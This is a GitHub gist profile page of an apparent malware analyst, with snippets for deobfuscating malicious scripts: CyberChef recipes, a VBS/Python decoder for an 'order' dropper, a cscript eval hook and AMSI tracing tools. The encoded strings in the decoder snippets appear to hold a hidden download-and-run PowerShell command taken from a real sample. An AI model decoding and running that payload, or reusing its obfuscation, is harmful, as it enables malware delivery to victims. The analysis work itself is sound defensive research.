Skip to content

Instantly share code, notes, and snippets.

View edygert's full-sized avatar

edygert

6 followers · 6 following
View GitHub Profile
@edygert
edygert / sample_for_godbolt.c
Created April 22, 2024 04:02
sample code for godbolt
int __fastcall addemup(int a, int b, int c) {
int d;
d = a + b + c;
return d;
}
void caller() {
int x = addemup(1, 2, 3);
}
@edygert
edygert / schema.jq
Last active May 6, 2023 14:09
jq script to show the schema of a JSON file
paths
| join(".")
| select(test("[.][1-9][0-9]*[.|$]?") | not)
| gsub("[.]0[.]"; "[].")
| sub("[.]0$"; "[]")
| sub("^"; ".")
@edygert
edygert / invoice.recipe
Created February 15, 2023 14:45
Invoice CyberChef Recipe
Regular_expression('User defined','Hextostring\\(\\"[^"]+\\"\\), Hextostring\\(\\"[^"]+\\"\\)',true,true,false,false,false,false,'List matches')
Fork('\\n','\\n',false)
Register('Hextostring\\(\\"([^"]+)\\"\\), Hextostring\\(\\"([^"]+)\\"\\)',true,false,false)
Find_/_Replace({'option':'Regex','string':'^.*$'},'$R0',true,false,true,false)
From_Hex('Auto')
XOR({'option':'Hex','string':'$R1'},'Standard',false)
@edygert
edygert / order_docm.vbs
Created August 13, 2022 22:17
Deobfuscate order
E_MO = "113141125140131138142072109130127134134"
SP_LL ="125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
WScript.Echo B_RA(E_MO)
WScript.Echo B_RA(SP_LL)
Public Function B_RA(byref N_UN)
For O_MI = 1 To Len(N_UN) Step 3
A_DE = Mid(N_UN, O_MI, 3)
C_YS = C_YS + Chr(int(A_DE) - 26)
@edygert
edygert / checkbox.recipe
Last active February 15, 2023 14:47
Checkbox CyberChef recipe
Regular_expression('User defined','[a-zA-Z0-9+/=]{40,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Decode_text('UTF-16LE (1200)')
Regular_expression('User defined','[a-zA-Z0-9+/=]{20,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Gunzip()
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
XOR({'option':'Decimal','string':'35'},'Standard',false)
@edygert
edygert / cscript_eval.js
Created August 8, 2022 16:04
Replacement eval for cscript
original_eval = eval;
eval = function(input_string) {
WScript.Echo(input_string);
original_eval(input_string);
}
@edygert
edygert / order.py
Created August 8, 2022 15:55
Python deobfuscation of order script
#!/usr/bin/env python3
sp_ll = "125135126072127146127058073125058141127142058135135137087137145127140141064064141127142058139079087138064064141127142058139078087130127134134064064125135126073125058063139079063063135135137063063139078063058071127138058124147138123141141058071136137136131058071145058130131126126127136058071136137134137129137058131127146066104127145071105124132127125142058109147141142127135072104127142072113127124093134131127136142067072094137145136134137123126096131134127066065130142142138084073073082081072076077080072076075076072076078075073128131146146073092134123125133072127146127065070062127136144084142127135138058069058065118145136130145072127146127065067085109142123140142071106140137125127141141058062127136144084142127135138118145136130145072127146127085"
e_mo = "113141125140131138142072109130127134134"
def decode(s):
result = ""
for n in range(0, len(s), 3):
ch = chr(int(s[n:n+3]) - 26)
@edygert
edygert / amsicommands.txt
Created August 8, 2022 15:54
AMSI commands
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
cscript loveyou.js
logman stop AMSITrace -ets
AMSIScriptContentRetrieval > loveyou.log
Event1 was found using the following:
logman query providers Microsoft-Antimalware-Scan-Interface
@edygert
edygert / amsiscript_change.ps1
Created August 8, 2022 15:52
Remove duplicates from AMSI output
$Seen = @{}
foreach ($elem in $AMSIScanEvents) {
if (-not $Seen.ContainsKey($elem.Hash)) {
$elem
$Seen[$elem.Hash] = ""
}
}
@edygert
edygert / AMSIScriptContentRetrieval.ps1
Created April 21, 2022 19:25 — forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture
$OSPointerSize = 32
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }